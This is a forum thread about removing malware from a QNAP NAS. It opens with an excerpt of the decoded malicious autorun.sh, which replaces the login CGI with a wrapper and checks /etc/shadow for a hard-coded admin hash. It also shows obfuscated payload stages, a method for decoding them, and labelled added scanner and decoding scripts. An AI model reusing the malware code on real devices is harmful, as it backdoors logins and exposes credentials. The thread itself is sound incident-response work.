case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}
. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }
true;
}
#]
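The decoded script above leaves a fixed set of artefacts: the parked QTSauthLogin.cgi, a shell wrapper in place of authLogin.cgi, a cron line pointing into a hidden folder at a volume root, .log/.cgi_log and .BOOT_TIME. As an added example (not part of the original post), the following checks a NAS root or a mounted copy of it for exactly those; scan_root, make_sample_tree, the finding labels and the sample tree are made up for this example.

```shell
#!/bin/sh
# scan_root ROOT: print one line per artefact of the decoded autorun.sh found
# under ROOT. Pass / on a live NAS or the mount point of a copy.
scan_root() {
    r=${1%/}
    cgi="$r/home/httpd/cgi-bin"

    # The script parks the real login CGI as QTSauthLogin.cgi ...
    if [ -f "$cgi/QTSauthLogin.cgi" ]; then
        echo "cgi-copy $cgi/QTSauthLogin.cgi"
    fi
    # ... and writes a '#!/bin/sh' wrapper in its place.
    if [ "$(head -c 2 "$cgi/authLogin.cgi" 2>/dev/null)" = '#!' ]; then
        echo "cgi-wrapper $cgi/authLogin.cgi"
    fi
    # The admin hash the script greps /etc/shadow for before touching the CGI.
    if grep -qF 'admin:$1$$CoERg7ynjYLsj2j4glJ34.:' "$r/etc/shadow" 2>/dev/null; then
        echo "shadow-hash $r/etc/shadow"
    fi
    # Cron entry running a .sh that sits directly in a hidden folder at a
    # volume root (the script's bdir/.ipath/crons.sh layout). Review each hit.
    for tab in "$r/etc/config/crontab" "$r/mnt/HDA_ROOT/.config/crontab"; do
        [ -f "$tab" ] || continue
        grep -nE '^[^#]*[[:space:]](/share/[^/ ]+|/mnt/HDA_ROOT)/\.[^/ ]+/[^/ ]+\.sh[[:space:]]' "$tab" |
            sed "s|^|cron $tab:|"
    done
    # Logged login POST data and the installer's timestamp file.
    for vol in "$r"/share/* "$r/mnt/HDA_ROOT"; do
        if [ -f "$vol/.log/.cgi_log" ]; then echo "cgi-log $vol/.log/.cgi_log"; fi
        if [ -f "$vol/.BOOT_TIME" ]; then echo "boot-time $vol/.BOOT_TIME"; fi
    done
    return 0
}

# Constructed sample tree (not real NAS data) for trying the scanner offline.
make_sample_tree() {
    mkdir -p "$1/home/httpd/cgi-bin" "$1/etc/config" "$1/share/CACHEDEV1_DATA/.log"
    printf '#!/bin/sh\n' > "$1/home/httpd/cgi-bin/authLogin.cgi"
    printf '\177ELF' > "$1/home/httpd/cgi-bin/QTSauthLogin.cgi"
    printf '%s\n' '0 4 * * * /sbin/hwclock -s' \
        '20 * * * * /share/CACHEDEV1_DATA/.example/example.sh > /dev/null 2>&1' \
        > "$1/etc/config/crontab"
    : > "$1/share/CACHEDEV1_DATA/.log/.cgi_log"
}

# With an argument, scan that root; without one, scan the constructed sample.
if [ "$#" -gt 0 ]; then
    scan_root "$1"
else
    demo=$(mktemp -d) && make_sample_tree "$demo" && scan_root "$demo"
fi
```

A hit on the cron check is a lead to inspect, not a verdict; the other checks match file names and contents taken directly from the script.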
Hi MouseTick,
Thanks for the reply! Can you tell us how to "decrypt" the shell script? I'd like to look into mine and see if I can find anything myself.
I don't get the point why to disconnect from LAN?
-
- Easy as a breeze
- Posts: 356
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Also another question, is the following cron job safe:
*/5 * * * * /mnt/ext/opt/apache/bin/php /mnt/ext/opt/qdesk/www/public/index.php cli watchdog woof
-
- Starting out
- Posts: 28
- Joined: Wed Nov 18, 2015 4:50 am
Re: Strange folders and cronjobs
somy1982 wrote:benzo83 wrote:dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
not too cheap 300euro :/
Do you have music station installed and enabled?
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
Unfortunately I do.

- Don
- Guru
- Posts: 12021
- Joined: Thu Jan 03, 2008 4:56 am
- Location: Long Island, New York
Re: Strange folders and cronjobs
You disconnect from the LAN to protect other devices on the LAN from being compromised by the NAS infection.
-
- Been there, done that
- Posts: 592
- Joined: Thu Aug 24, 2017 10:28 pm
Re: Strange folders and cronjobs
somy1982 wrote:Can you tell us how to "decrypt" the shell script? Id like to look into mine and see if I can find anything myself.
The only way to decrypt the script is to execute it because it is self-decrypting. Since executing it to completion is harmful, it needs to be surgically edited to keep the decryption part but disable the harmful part. That part changes from script to script so it's not easy to give general instructions. Also some scripts are encrypted with multiple passes, so the neutering process needs to be applied several times.
I greatly discourage you from trying to do this if you don't fully understand what I just said and what follows.
Example: autorun.sh posted by benzo83. Look for the note "<<<<<<<<<<============ DANGEROUS PART HERE" (added by me).
Code:
#!/bin/sh
WDsKwcX=${NfPe}tr${TOtnQoPZlj}$XtvYzUmXi$'';XlvTWbP=$HwyETG$""${BOQDRIBofeJvZ}\\$KcLJmW$""${mBgBLqNugLIeP};WHJRnC=${AfESPMztIUpwo}${ayhM}${ifMZuHyfid}${XlvTWbP}1${ORdB}3${naPAXdYJve}3$nXrwvwbgB$'';HAFPgiL=${IQcueXfGmyiCy}${oUpr}${yVUyYguMwM}${XlvTWbP}0${cZew}5${NvQVndODqz}5$pDkAgrLTF$'';TQzLfG=${tfBBVkrxivfHq}${HJzN}${lDvZlgOBlx}${XlvTWbP}1${ybgg}3${oMdRZIuYWi}4$vcMuhGGuT$'';$WDsKwcX 'Cmi`BLh}Xfrg&vH+AjZKS'$WHJRnC't>]IV)YkTqz*QyPG{aN!OMR<cd '$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E' << "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
E>/fJ%/Cc|mBnkq\]x[d=em$$mjlMXT&VRmjYFOf+Oc*CIN&ABwsVmjB+z\A!M+\F)[`+&RABwszI}mj-#uVK[fG&}k%nmj}} V-cD&wsmrL-62r)JWVJ%mjOX)R+&wsVOmjlzx`kPAuAUk&)BmjNNI%tz&wsmjO!)I++`R&(kWCBws)%CBmjTn=cqz-PRU)c&mj*MZ\FB bWzqxW&mjJ"TBefqA&Vwsmj+kKV&)mrL-6BrCBVmjq-OMPTn&mjT()}N`Cu*&wsmjNYC]xc&B\mrL-61rWmj=xJOY*ZlWM&ws(mjK`n(bQKcY&kWCBwsmjx
...remainder omitted for brevity...
Before neutering
Code:
'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
After neutering
Code:
'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg"
Executing the neutered script produces the following output, another encrypted script:
Code:
#!/bin/sh
$edaDvWOGKQH$""${CBNj}ty${JLrbRrhksoP}pe; t${eRcvpXBRvLuGVR}ype; com${xzEtMGbZ}mand${mmwtxhS}; $'\x62'uiltin${rNuyR}; tr${CcOVaqpEpUa}ue${PPonIc}; ${rXuoRRVy}false; unse${jdQhDcxqyUuh}${kBgvLewYlcDOl}${iAjeHbDp}t; ${RaMt}u$'\x6e'set${DxrBqjd}${jfumPVsEk}; ${PJsWOh}ev$'\x61'l${QOirJkgClB}; f${MVdfYFMhJ}alse; ${OwPbFgfCcHez}true; ${gcnlvMgKyJkNGy}$NpMsQSqXOMZ$''tes${VgejCHV}t; built${DsvVSOxeL}in; tr${SWtFlC}u${IcVJWwRLDBRDzF}$'\x65'${FYSAdkVijlD}; bu${OlJXwPpysLfOASB}${LGAY}${bGmFDmYdf}iltin; e$'\x76'a${dFhi}l${DxZfBKVfqtKS}; ${kWUAWXU}test; ${BualwUBF}builtin${kRKh}; $leEfFdMWUbFN$''uns${QzedDJQNeCz}e${HwPRGWnmjT}t; fal${tptQnbfJGUNApw}s${qPZqCftUdfd}e${mMNoReiqZIgL}; RxlSjPq=${JlEHKYwjrbodO}${xnxikuGpqHU}${DLlkJFP}tr; eVBTQyl=${JJRQ}${pksLKRdIF}\\${DpBH}${THSiqOYSU}; UVeZowLy=${mgMhJWRtg}${sytoKQCeJvGkIDw}$pctXOoTogzS$""${eVBTQyl}${IjiHrQctVyNBIdm}$wSiulfNuqQa$""13${LKaC}3; qewuHlK=${hAMbPTKJn}${oFzvTGoyZiAPyve}$eYjAzJvmNqy$""${eVBTQyl}${PphAxrnCnZWgzsz}$vIJVuAccEvM$""05${Ibid}5; gysIyg=${nLAzJEmiz}${ejCYiEfvQIJaqIU}$ovYxEfMaCWf$""${eVBTQyl}${XKvJYQlviynEHGt}$VSdvNePfJbJ$""13${IImJ}4; $RxlSjPq 's;t{CMau+&L`b'"'"'B!HfZwrld$VY'$gysIyg''$qewuHlK'Xy|Um)cN'$UVeZowLy']Ti* JIh<SW"\nRQkoO=(%}v#q>EzjKGFePgpAxDn' 'RjUOHgyV}ep%XQwkqi+ Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<= ========= DANGEROUS PART HERE
eG/qfl/%=y&WLDAgw*>ECihjx*>EC+:/qfl:/%qfl:/K%A/qfl:/K%A/%qfl:/K%A/qfl/b11:/K%A/SDJ$S/%qfl:/K%A/SDJ$S/qflhyJDUU$l)w(-w)fAl$U&wY/)&-/lKSSw2Y<1wmmw)fAl$U&wopwxwg&%gw(|whj1hw<<w&J=Dwh.hw<<wA&gKAlQwSDJ$SwAihjx1`hjx1eedzG/
+h+hQwJ$%&wjAwflw/dzG/
d/dmzG/
d/dpwAihjxA`/d+hQw&J=DwhjxA`hjxAeedzG/
... remainder omitted for brevity ...
Before neutering
Code:
Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<========== DANGEROUS PART HERE
After neutering
Code:
Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"
Executing the neutered 2nd stage script produces the following output, the unencrypted autorun.sh:
Code:
#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
... remainder omitted for brevity ...
Post your script(s) here and I'll see what I can do.
I don't get the point why to disconnect from LAN?
As an extra precaution without knowing the source or the means by which the NAS was infected. In a way that's putting the NAS, which in benzo83's case may be running SSH & UPNP backdoors and who knows what else, under quarantine.
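The peeling procedure described in the post above, as an added example that is not part of the original post: it cuts everything from the pipe onward on the here-document opener line (the same cut as in the two before/after pairs), runs the neutered layer, and repeats on the output until no opener is left. The two-layer sample is constructed and harmless; the function names, file names and the 10-layer cap are assumptions, and a layer that does not have exactly one such opener line is refused rather than run.

```shell
#!/bin/sh
# Constructed, harmless two-layer sample in the same shape as the posted
# script: variable-padded tr, quoted here-document, pipe into sh.
# Innermost payload is the single line: echo done
write_sample() {
    cat > "$1" << 'SAMPLE'
#!/bin/sh
T=${a}tr${b}; $T 'n-za-m!#' 'a-z|<' << "S1" | sh${c}
ge 'n-m' 'o-mn' ## "E" ! fu
qota pazq
E
S1
SAMPLE
}

# Print FILE with the hand-off to the interpreter removed from the
# here-document opener line. Returns 1 and prints nothing unless exactly one
# line has the '<< "DELIM" | ...' shape, so an unfamiliar layout is refused.
neuter_stage() {
    opener='<<[[:space:]]*"?[A-Za-z0-9_]+"?'
    hits=$(grep -cE "${opener}[[:space:]]*\|" "$1" 2>/dev/null || true)
    [ "$hits" -eq 1 ] 2>/dev/null || return 1
    sed -E "s/(${opener})[[:space:]]*\|.*\$/\1/" "$1"
}

# Peel FILE layer by layer into OUTDIR: neutered.N is what gets run,
# layer.N is what it printed. Echoes the number of layers peeled.
# The innermost layer is written to disk and never executed.
peel_all() {
    cur=$1; out=$2; n=0
    while [ "$n" -lt 10 ] && neuter_stage "$cur" > "$out/neutered.$((n + 1))"; do
        n=$((n + 1))
        sh "$out/neutered.$n" > "$out/layer.$n" || return 1
        cur="$out/layer.$n"
    done
    rm -f "$out/neutered.$((n + 1))"   # empty file left by the refused pass
    echo "$n"
}

# Stand-alone run on the constructed sample.
work=$(mktemp -d)
write_sample "$work/autorun.sh"
n=$(peel_all "$work/autorun.sh" "$work")
echo "peeled $n layer(s); innermost script:"
cat "$work/layer.$n"
```

Each neutered layer still executes its own header statements and tr, so a real sample belongs in a disposable, network-isolated VM, with every neutered.N read before it is run.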
-
- Easy as a breeze
- Posts: 356
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
benzo83 wrote:somy1982 wrote:benzo83 wrote:dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
not too cheap 300euro :/
Do you have music station installed and enabled?
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
unfortunately i do
Check all apps under .qpkg folder - reinstall them all if you can. I found many sh scripts infected. Also the ones malware remover claimed recovered!! When exactly on 25/8 was the file created? Mine was around 9am Europe time.
-
- Been there, done that
- Posts: 592
- Joined: Thu Aug 24, 2017 10:28 pm
Re: Strange folders and cronjobs
Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.
This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.
-
- Easy as a breeze
- Posts: 356
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Mousetick wrote:Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.
This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.
Thanks, have done that and removed the autorun.sh. Deleted everything I could find and also removed all suspicious cron jobs. The NAS is restarted and the jobs are removed permanently, it seems.
Today I went into the .qpkg folder and found many files hacked; now I have reinstalled all apps. Hopefully that's it. Otherwise I have to start from scratch.

Does anybody know if QNAP provides a way to completely reset the QTS OS and leave data unchanged?